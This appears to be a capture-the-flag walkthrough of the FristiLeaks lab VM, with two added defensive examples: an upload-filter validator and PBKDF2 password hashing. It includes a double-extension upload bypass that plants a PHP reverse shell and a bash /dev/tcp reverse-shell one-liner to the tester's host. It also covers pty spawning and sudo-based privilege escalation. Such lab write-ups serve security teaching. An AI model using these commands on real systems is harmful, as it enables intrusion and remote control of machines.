Started out with a basic nmap scan: all ports, T4 timing and service detection.
nmap -p- -sV -T4 10.0.0.159
Below you can see the full output.
We've got port 80 open, so it's time to explore a web app.
So much pink. Let's run nikto and start poking around.
While nikto was running I curled robots.txt.
From that we see the /cola/, /sisi/ and /beer/ directories; going to those takes me to a Jedi!
I didn't know what sisi was, but I did know that beer and cola were drinks. The webpage said to stay calm and drink fristi, so I wondered if /fristi/ existed.
I doubt I need to brute force this; I must have missed something. I went back to the webpage and viewed the source, hoping for a hint at a user name or something.
Cool, a note from the dev that never got cleaned up for production. It looks like they are using base64 for image encoding. When you scroll to the bottom there's another message.
We know that the dev was using base64 for images, so I used the base64 utility from the GNU coreutils package.
Let's open up image.png and see if it decoded into something we can use.
That is a lot of K's. Let's see if we can use the user eezeepz and the list of K's and e's we just found.
Sweet, logged into the web app. Let's find a way to get a local shell with that upload button.
Playing with the upload button burnt a lot of my time and I learned a major lesson: I need to drill it into my head to try the easy stuff first.
I ended up spending about an hour researching how to bypass upload filters, looking at everything besides simply renaming backdoor.php to backdoor.php.jpg. I never even tried that because I assumed it wouldn't work. I figured FristiLeaks was from around 2015 or so and had to have some sort of new trick to learn. I got mad at myself for not trying it first.
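As an added example, not code from the write-up or from the FristiLeaks box, here is the kind of server-side check that the rename above slips past, next to a hardened version. The file names and byte strings are constructed. The point for whoever writes the upload handler: a suffix-only check sees backdoor.php.jpg as a JPEG, while a web server that maps .php to its PHP handler with Apache-style AddHandler still finds a .php extension in the middle of that name, so the allow list has to look at the whole name and at the content, and the file should be stored under a name the server generates rather than the one the client sent.

```python
import os
import re
import secrets

# Constructed sample uploads: (client file name, leading bytes) as the handler sees them.
SAMPLES = {
    "photo.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF",   # genuine JPEG header
    "backdoor.php.jpg": b"<?php echo 'x'; ?>",       # the rename from the write-up
    "shell.php": b"<?php echo 'x'; ?>",
}

ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}
MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}


def naive_is_allowed(filename):
    """A suffix-only check: it accepts backdoor.php.jpg because the name ends in .jpg."""
    return filename.lower().endswith(tuple(ALLOWED_EXT))


def strict_is_allowed(filename, data):
    """Hardened check: exactly one extension from the allow list, a plain stem with
    no further dots (so no double extensions), and leading bytes matching the type."""
    base = os.path.basename(filename.replace("\\", "/"))
    stem, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in ALLOWED_EXT:
        return False
    if "." in stem or not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", stem):
        return False
    return any(data.startswith(magic) for magic in MAGIC[ext])


def storage_name(filename, data):
    """Name to write the file under: a random token plus the validated extension,
    so nothing attacker-chosen reaches the file system."""
    if not strict_is_allowed(filename, data):
        raise ValueError("rejected upload: %r" % filename)
    ext = os.path.splitext(filename)[1].lower()
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print("%-18s naive=%-5s strict=%s"
              % (name, naive_is_allowed(name), strict_is_allowed(name, data)))
```

Serving the upload directory from a location with script execution disabled is the other half of the fix; the validator only keeps bad names and bad content out, it does not change what the web server will execute.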
On Kali by default there are several PHP web shells in the /usr/share/webshells/php directory. You need to go in and change the port and IP in these, and then for this particular shell use
cp /usr/share/webshells/php/php-reverse-shell.php webshell.php.jpg
This uses the copy command to create a new version with a .jpg extension on the end.
Then upload your webshell with the upload button.
Then browse to /uploads!
Whoops! No directory indexing, so let's try to call the PHP renamed to JPG manually.
And let's check out our listener.
Local dance! On to enumeration 2.0 for all the priv esc things!
Well, no TTY shell, so we need to spawn one. I tried to spawn with bash and vi but neither worked, so Python it is.
python -c 'import pty; pty.spawn("/bin/sh")'
Hmmmmm? What's wrong with that? Let's see if we can find our python binary, as our PATH looked funky, via
Looks like there is one in /usr/bin; let's try it this time.
/usr/bin/python2 -c 'import pty; pty.spawn("/bin/sh")'
Awesome, we should have a full TTY shell now.
There is a note in eezeepz's home dir from the admin: he has privs to certain bins, and "be sure to call the full path and place the commands into the /tmp folder and they will run".
I created a listener and used those binaries to pipe into a bash reverse shell.
/home/admin/echo | bash -i >& /dev/tcp/10.0.0.130/5567 0>&1
That got me to the point where I could poke around /home/admin.
I could now see the cronjob and cryptedpass.txt, and fristigod with a whoisyourgodnow.txt file.
Looking at cryptpass.py you can see it does base64 and then rot13. I tried a couple of decoders I use frequently but ultimately decided it would be easier to reverse the Python code to reverse the encryption. I looked at the libraries imported by the original script to understand everything that was going on and then wrote something quick and dirty.
#!/usr/bin/python
import codecs, base64

# cryptpass.py base64-encodes the password, reverses the string and rot13s it.
# rot13 is its own inverse and works one character at a time, so reversing
# first and then un-rot13ing gives the base64 back; one b64decode finishes it.
d = codecs.decode('=RFn0AKnlMHMPIzpyuTI0ITG'[::-1], 'rot13')
u = base64.b64decode(d)
print(u.decode())
Running my script gets the following output.
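As an added example, not the box's cryptpass.py and not the write-up's own script, here is the encoder reconstructed from the description above (assumed order: base64, reverse the string, rot13) with its matching decoder, to show that the scheme round-trips with no secret involved at all. Beside it is what a stored credential should look like instead: a salted PBKDF2 hash that can be verified but not reversed. The sample passwords are made up.

```python
import base64
import codecs
import hashlib
import hmac
import secrets


def crypt_encode(plaintext):
    """Reconstruction of the cryptpass.py scheme as the write-up describes it
    (assumption: base64, then reverse, then rot13); not the original file."""
    b64 = base64.b64encode(plaintext.encode("utf-8")).decode("ascii")
    return codecs.encode(b64[::-1], "rot13")


def crypt_decode(token):
    """Undo it without any key: rot13 is its own inverse and maps one character
    at a time, so it commutes with reversal; then a single base64 decode."""
    b64 = codecs.decode(token, "rot13")[::-1]
    return base64.b64decode(b64).decode("utf-8")


def hash_password(password, salt=None, iterations=200000):
    """What a stored credential should look like: salted PBKDF2-HMAC-SHA256,
    with the parameters kept next to the digest so they can be raised later."""
    salt = salt if salt is not None else secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), digest.hex())


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; constant-time compare."""
    algo, iters, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    # Constructed sample password, not one from the box.
    token = crypt_encode("correct horse battery staple")
    print(token, "->", crypt_decode(token))
    stored = hash_password("correct horse battery staple")
    print(stored, verify_password("correct horse battery staple", stored))
```

The difference that matters for whoever finds a cryptedpass.txt on a box: the first pair of functions is encoding, and anyone who can read the file and the script gets the password back; the second pair is hashing, and reading both the file and the code still leaves a guess-and-check problem with a per-password salt.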
sudo -l gave me a directory with a do command script.
The flag for good measure!
Make sure to try the basic stuff first. If anything, this box taught me that. Don't assume that because it looks easy there is going to be an additional layer of difficulty stacked on top of the local shell staring you in the face.
Enumeration is always key!
I had never really had to use sudo -u before. It's handy to know, and it caused me to read the sudo man page again. I don't know what I would do without man pages. Good documentation and RTFM are worth their weight in gold.